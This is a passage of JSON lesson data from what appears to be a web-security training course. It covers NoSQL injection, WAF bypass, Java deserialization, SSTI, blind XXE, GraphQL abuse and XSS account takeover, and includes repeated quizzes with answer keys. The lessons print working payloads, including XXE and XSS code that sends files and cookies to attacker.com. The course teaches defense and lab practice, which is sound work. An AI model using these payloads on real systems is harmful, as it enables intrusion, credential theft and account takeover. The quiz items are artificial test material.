files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-nosql-injection","cat":"Web Application","title":"NoSQL Injection (MongoDB)","diff":2,"xp":150,"intro":"SQL injection's cousin \u2014 query manipulation in document databases.","sections":[{"type":"text","content":"MongoDB queries use JSON operators. Injecting $gt, $ne, $regex operators bypasses authentication and extracts data without traditional SQL syntax."},{"type":"code","lang":"bash","content":"# Authentication bypass\nPOST /login\n{\"username\":{\"$ne\":\"\"},\"password\":{\"$ne\":\"\"}}\n# Extracts users where username and password are not empty = all users\n\n# Data extraction with $regex\n{\"username\":\"admin\",\"password\":{\"$regex\":\"^a\"}}\n# Try each starting character until you find matches\n\n# In URL parameters\n?username[$ne]=&password[$ne]="},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"NoSQL injection uses which operators?","opts":["SQL keywords","MongoDB operators like $ne, $gt, $regex","HTML tags","CSS selectors"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-waf-bypass","cat":"Web Application","title":"WAF Bypass Techniques","diff":4,"xp":250,"intro":"Get your payloads past Web Application Firewalls.","sections":[{"type":"text","content":"WAFs match known attack patterns. Bypass with encoding (URL, Unicode, hex), case variation, comment injection, alternative syntax, and chunked transfer encoding."},{"type":"code","lang":"bash","content":"# XSS WAF bypass techniques\n<ScRiPt>alert(1)</ScRiPt>  # case variation\n<img src=x onerror=alert(1)>  # event handler\n<svg/onload=alert(1)>  # different tag\n<details/open/ontoggle=alert(1)>  # uncommon event\n\n# SQLi WAF bypass\n1'/*!UNION*//*!SELECT*/1,2,3--  # MySQL comments\n1' UNION ALL%0aSELECT%0a1,2,3--  # newline encoding\n1' UnIoN SeLeCt 1,2,3--  # mixed case\n\n# Double URL encoding\n%2527 instead of %27 (single quote)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WAFs are bypassed by...","opts":["Stronger encryption","Encoding, case variation, and alternative syntax","Faster requests","Different protocols"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-deserialization-java","cat":"Web Application","title":"Java Deserialization RCE","diff":4,"xp":300,"intro":"Exploit unsafe Java deserialization for remote code execution.","sections":[{"type":"text","content":"Java's ObjectInputStream.readObject() instantiates objects from serialized data. If gadget classes (Commons Collections, Spring, etc.) are on the classpath, an attacker crafts a serialized object chain that executes arbitrary commands."},{"type":"code","lang":"bash","content":"# Generate payload with ysoserial\njava -jar ysoserial.jar CommonsCollections1 'id' | base64\n# Send as serialized Java object\n# Look for: base64 data starting with rO0AB (Java serialized)\n# Content-Type: application/x-java-serialized-object\n# Or in cookies, parameters, custom headers\n\n# Detection: search for rO0AB in requests/responses\necho rO0ABXNyABdq... | base64 -d | xxd | head"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Java deserialization RCE requires...","opts":["SQL injection","Vulnerable gadget classes on the application's classpath","Physical access","Admin credentials"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-ssti-exploitation","cat":"Web Application","title":"SSTI to RCE Exploitation Chain","diff":4,"xp":250,"intro":"Turn template injection into full remote code execution.","sections":[{"type":"text","content":"Each template engine has a different path to RCE. Jinja2: access __class__.__mro__ to reach builtins. Twig: registerUndefinedFilterCallback. Freemarker: new() to instantiate Java classes."},{"type":"code","lang":"python","content":"# Jinja2 (Python) RCE chain:\n# Step 1: Access object class\n{{''.__class__}}\n# Step 2: Walk MRO to find builtins\n{{''.__class__.__mro__[1].__subclasses__()}}\n# Step 3: Find os._wrap_close or subprocess.Popen\n{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()}}\n\n# Shorter Jinja2 RCE:\n{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSTI detection starts with...","opts":["SQL injection","Injecting template expressions like {{7*7}} and checking if 49 appears","Port scanning","Directory brute-forcing"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-blind-xxe","cat":"Web Application","title":"Blind XXE via Out-of-Band","diff":4,"xp":250,"intro":"Exfiltrate data when XXE output isn't reflected in the response.","sections":[{"type":"text","content":"When XXE results aren't displayed, use out-of-band techniques: make the server fetch your DTD which reads a file and sends it to your server as a URL parameter."},{"type":"code","lang":"xml","content":"<!-- Attacker's malicious DTD (hosted on attacker.com/evil.dtd) -->\n<!ENTITY % file SYSTEM 'file:///etc/passwd'>\n<!ENTITY % eval '<!ENTITY &#x25; exfil SYSTEM \"http://attacker.com/?data=%file;\">'>\n%eval;\n%exfil;\n\n<!-- Payload sent to vulnerable app -->\n<?xml version='1.0'?>\n<!DOCTYPE foo [\n  <!ENTITY % xxe SYSTEM 'http://attacker.com/evil.dtd'>\n  %xxe;\n]>\n<root>test</root>\n\n<!-- Check attacker server logs for the exfiltrated data -->"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Blind XXE exfiltrates data via...","opts":["Direct response","Out-of-band HTTP requests to an attacker-controlled server","Error messages","Timing"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-graphql-introspection-abuse","cat":"Web Application","title":"GraphQL Deep Exploitation","diff":4,"xp":250,"intro":"Beyond introspection \u2014 batch queries, nested DoS, mutation abuse.","sections":[{"type":"text","content":"After mapping the schema via introspection, exploit: batch queries to bypass rate limits, deeply nested queries for DoS, unauthorized mutations, and field-level authorization bypass."},{"type":"code","lang":"bash","content":"# Batch query (bypass per-request rate limit)\n[{\"query\":\"mutation{login(u:\\\"admin\\\",p:\\\"test1\\\")}\"},{\"query\":\"mutation{login(u:\\\"admin\\\",p:\\\"test2\\\")}\"},{\"query\":\"mutation{login(u:\\\"admin\\\",p:\\\"test3\\\")}\"}]\n\n# Nested query DoS\n{users{posts{comments{user{posts{comments{user{posts}}}}}}}}\n\n# Authorization bypass: access admin mutations\nmutation{updateUserRole(userId:1,role:ADMIN){id role}}\n\n# Field suggestion exploit (even without introspection)\n# Misspell a field -> error reveals valid fields\n{usrs{id}} -> 'Did you mean users?'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL batch queries bypass...","opts":["Authentication","Per-request rate limiting","Encryption","CORS"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-browser-xss-chain","cat":"Web Application","title":"Full XSS-to-Account-Takeover Chain","diff":5,"xp":300,"intro":"Chain stored XSS into session hijacking, CSRF, and full account takeover.","sections":[{"type":"text","content":"A single stored XSS becomes devastating when chained: steal session cookies, forge CSRF requests, add an attacker-controlled email to the account, reset the password, and take over permanently."},{"type":"code","lang":"javascript","content":"// Step 1: Steal cookies\nnew Image().src='https://attacker.com/steal?c='+document.cookie;\n\n// Step 2: If HttpOnly, steal CSRF token + make requests\nfetch('/settings').then(r=>r.text()).then(html=>{\n  const token = html.match(/csrf_token.*?value=\"([^\"]+)\"/)[1];\n  // Step 3: Add attacker email to account\n  fetch('/settings/email',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:'email=attacker@evil.com&csrf='+token});\n  // Step 4: Trigger password reset to attacker email\n  fetch('/forgot-password',{method:'POST',body:'email=attacker@evil.com'});\n});"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XSS-to-account-takeover bypasses HttpOnly cookies by...","opts":["Cracking them","Using the XSS to make authenticated requests directly from the victim's browser","Decrypting them","Reading them from disk"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 